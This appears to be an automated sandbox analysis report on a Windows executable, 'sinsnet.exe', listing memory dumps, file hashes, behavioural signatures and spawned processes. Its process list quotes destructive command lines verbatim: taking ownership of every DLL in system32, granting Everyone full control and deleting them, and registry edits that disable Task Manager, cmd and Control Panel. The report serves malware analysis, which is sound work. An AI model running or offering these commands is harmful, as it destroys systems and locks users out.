memory/2604-5-0x000007FEFA910000-0x000007FEFA95C000-memory.dmp

memory/1528-4-0x000000013F290000-0x000000013F430000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\note.txt

MD5 78551eabd7131c45b744a0cf420d29f7
SHA1 0f6792d1f3339ab5ac7674ad46267049ec9eb2b7
SHA256 9904338a1a2758f5969ba2affe5c46beaac955b6c4b87c67d20063ef5e0602f8
SHA512 abee3d1cd3860afe799deaac6e2c45fb741504ff80eb9fc7f39705cd7a9d46f61cee13cea6e676a33ea566f9256e13fa62dac7156b376ff94a7ced742516c064

memory/2160-7-0x000007FEFA910000-0x000007FEFA95C000-memory.dmp

memory/664-8-0x000007FEFA910000-0x000007FEFA95C000-memory.dmp

memory/2904-9-0x000007FEFA910000-0x000007FEFA95C000-memory.dmp

memory/1052-10-0x000007FEFA910000-0x000007FEFA95C000-memory.dmp

memory/860-11-0x000007FEFA910000-0x000007FEFA95C000-memory.dmp

memory/280-12-0x000007FEFA910000-0x000007FEFA95C000-memory.dmp

memory/2672-13-0x000007FEFA910000-0x000007FEFA95C000-memory.dmp

memory/2936-14-0x000007FEFA910000-0x000007FEFA95C000-memory.dmp

memory/2924-15-0x000007FEFA910000-0x000007FEFA95C000-memory.dmp

memory/2240-16-0x000007FEFA910000-0x000007FEFA95C000-memory.dmp

memory/1868-17-0x000007FEFA910000-0x000007FEFA95C000-memory.dmp

memory/2588-18-0x000007FEFA910000-0x000007FEFA95C000-memory.dmp

memory/1408-19-0x000007FEFA910000-0x000007FEFA95C000-memory.dmp

memory/1608-20-0x000007FEFA910000-0x000007FEFA95C000-memory.dmp

memory/1760-21-0x000007FEFA910000-0x000007FEFA95C000-memory.dmp

memory/896-22-0x000007FEFA910000-0x000007FEFA95C000-memory.dmp

memory/1520-23-0x000007FEFA910000-0x000007FEFA95C000-memory.dmp

memory/964-24-0x000007FEFA910000-0x000007FEFA95C000-memory.dmp

memory/2396-25-0x000007FEFA910000-0x000007FEFA95C000-memory.dmp

memory/2912-26-0x000007FEFA910000-0x000007FEFA95C000-memory.dmp

memory/696-27-0x000007FEFA910000-0x000007FEFA95C000-memory.dmp

memory/1900-28-0x000007FEFA910000-0x000007FEFA95C000-memory.dmp

memory/1288-29-0x000007FEFA910000-0x000007FEFA95C000-memory.dmp

memory/1600-30-0x000007FEFA910000-0x000007FEFA95C000-memory.dmp

memory/2516-31-0x000007FEFA910000-0x000007FEFA95C000-memory.dmp

memory/2820-32-0x000007FEFA910000-0x000007FEFA95C000-memory.dmp

memory/640-33-0x000007FEFA910000-0x000007FEFA95C000-memory.dmp

memory/2816-34-0x000007FEFA910000-0x000007FEFA95C000-memory.dmp

memory/2748-35-0x000007FEFA910000-0x000007FEFA95C000-memory.dmp

memory/1148-36-0x000007FEFA910000-0x000007FEFA95C000-memory.dmp

memory/2252-37-0x000007FEFA910000-0x000007FEFA95C000-memory.dmp

memory/1936-38-0x000007FEFA910000-0x000007FEFA95C000-memory.dmp

memory/2116-39-0x000007FEFA910000-0x000007FEFA95C000-memory.dmp

memory/3148-40-0x000007FEFA910000-0x000007FEFA95C000-memory.dmp

memory/3196-41-0x000007FEFA910000-0x000007FEFA95C000-memory.dmp

memory/3256-42-0x000007FEFA910000-0x000007FEFA95C000-memory.dmp

memory/3292-43-0x000007FEFA910000-0x000007FEFA95C000-memory.dmp

memory/3340-44-0x000007FEFA910000-0x000007FEFA95C000-memory.dmp

memory/3372-45-0x000007FEFA910000-0x000007FEFA95C000-memory.dmp

memory/3460-46-0x000007FEFA910000-0x000007FEFA95C000-memory.dmp

memory/3512-47-0x000007FEFA910000-0x000007FEFA95C000-memory.dmp

memory/3556-48-0x000007FEFA910000-0x000007FEFA95C000-memory.dmp

memory/3588-49-0x000007FEFA910000-0x000007FEFA95C000-memory.dmp

memory/3652-50-0x000007FEFA910000-0x000007FEFA95C000-memory.dmp

memory/3692-51-0x000007FEFA910000-0x000007FEFA95C000-memory.dmp

memory/3720-52-0x000007FEFA910000-0x000007FEFA95C000-memory.dmp

memory/3756-53-0x000007FEFA910000-0x000007FEFA95C000-memory.dmp

memory/3792-54-0x000007FEFA910000-0x000007FEFA95C000-memory.dmp

memory/1528-55-0x000000013F290000-0x000000013F430000-memory.dmp

memory/2604-56-0x000007FEFA910000-0x000007FEFA95C000-memory.dmp

memory/664-57-0x000007FEFA910000-0x000007FEFA95C000-memory.dmp

memory/2904-58-0x000007FEFA910000-0x000007FEFA95C000-memory.dmp

memory/1052-59-0x000007FEFA910000-0x000007FEFA95C000-memory.dmp

memory/860-60-0x000007FEFA910000-0x000007FEFA95C000-memory.dmp

memory/280-61-0x000007FEFA910000-0x000007FEFA95C000-memory.dmp

memory/2936-62-0x000007FEFA910000-0x000007FEFA95C000-memory.dmp

memory/2924-63-0x000007FEFA910000-0x000007FEFA95C000-memory.dmp

memory/2240-64-0x000007FEFA910000-0x000007FEFA95C000-memory.dmp

memory/1868-65-0x000007FEFA910000-0x000007FEFA95C000-memory.dmp

memory/2588-66-0x000007FEFA910000-0x000007FEFA95C000-memory.dmp

memory/1408-67-0x000007FEFA910000-0x000007FEFA95C000-memory.dmp

memory/1608-68-0x000007FEFA910000-0x000007FEFA95C000-memory.dmp

memory/1760-69-0x000007FEFA910000-0x000007FEFA95C000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-06 09:35

Reported

2024-08-06 09:37

Platform

win10v2004-20240802-en

Max time kernel

103s

Max time network

105s

Command Line

"C:\Users\Admin\AppData\Local\Temp\sinsnet.exe"

Signatures

Disables RegEdit via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" C:\Windows\System32\reg.exe N/A

Disables Task Manager via registry modification

evasion

Disables cmd.exe use via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD = "1" C:\Windows\System32\reg.exe N/A

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sinsnet.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A

Enumerates physical storage devices

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\System32\reg.exe N/A
N/A N/A C:\Windows\System32\reg.exe N/A
N/A N/A C:\Windows\System32\reg.exe N/A
N/A N/A C:\Windows\System32\reg.exe N/A
N/A N/A C:\Windows\System32\reg.exe N/A
N/A N/A C:\Windows\System32\reg.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 744 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\cmd.exe
PID 744 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\cmd.exe
PID 744 wrote to memory of 3144 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 744 wrote to memory of 3144 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 744 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 744 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 744 wrote to memory of 1504 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 744 wrote to memory of 1504 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 744 wrote to memory of 628 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 744 wrote to memory of 628 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 744 wrote to memory of 1008 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 744 wrote to memory of 1008 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 744 wrote to memory of 3200 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 744 wrote to memory of 3200 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 2280 wrote to memory of 4580 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2280 wrote to memory of 4580 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 744 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 744 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 744 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 744 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 744 wrote to memory of 4404 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 744 wrote to memory of 4404 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 744 wrote to memory of 3788 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 744 wrote to memory of 3788 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 744 wrote to memory of 1700 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 744 wrote to memory of 1700 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 744 wrote to memory of 3756 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 744 wrote to memory of 3756 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 744 wrote to memory of 4844 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 744 wrote to memory of 4844 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 744 wrote to memory of 3524 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 744 wrote to memory of 3524 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 744 wrote to memory of 3296 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 744 wrote to memory of 3296 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 744 wrote to memory of 5092 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 744 wrote to memory of 5092 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 744 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 744 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 744 wrote to memory of 3148 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 744 wrote to memory of 3148 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 744 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 744 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 744 wrote to memory of 736 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 744 wrote to memory of 736 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 744 wrote to memory of 4476 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 744 wrote to memory of 4476 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 744 wrote to memory of 5036 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 744 wrote to memory of 5036 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 744 wrote to memory of 4100 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 744 wrote to memory of 4100 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 744 wrote to memory of 448 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 744 wrote to memory of 448 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 744 wrote to memory of 1876 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 744 wrote to memory of 1876 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 744 wrote to memory of 1620 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 744 wrote to memory of 1620 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 744 wrote to memory of 4604 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 744 wrote to memory of 4604 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 744 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 744 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 744 wrote to memory of 3948 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 744 wrote to memory of 3948 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 744 wrote to memory of 864 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 744 wrote to memory of 864 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe

Processes

C:\Users\Admin\AppData\Local\Temp\sinsnet.exe

"C:\Users\Admin\AppData\Local\Temp\sinsnet.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f c:\windows\system32\*.dll && icacls c:\windows\system32\*.dll /grant Everyone:(F) && del /s /q c:\windows\system32\*.dll && exit

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCMD /t REG_DWORD /d 1 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f

C:\Windows\System32\reg.exe

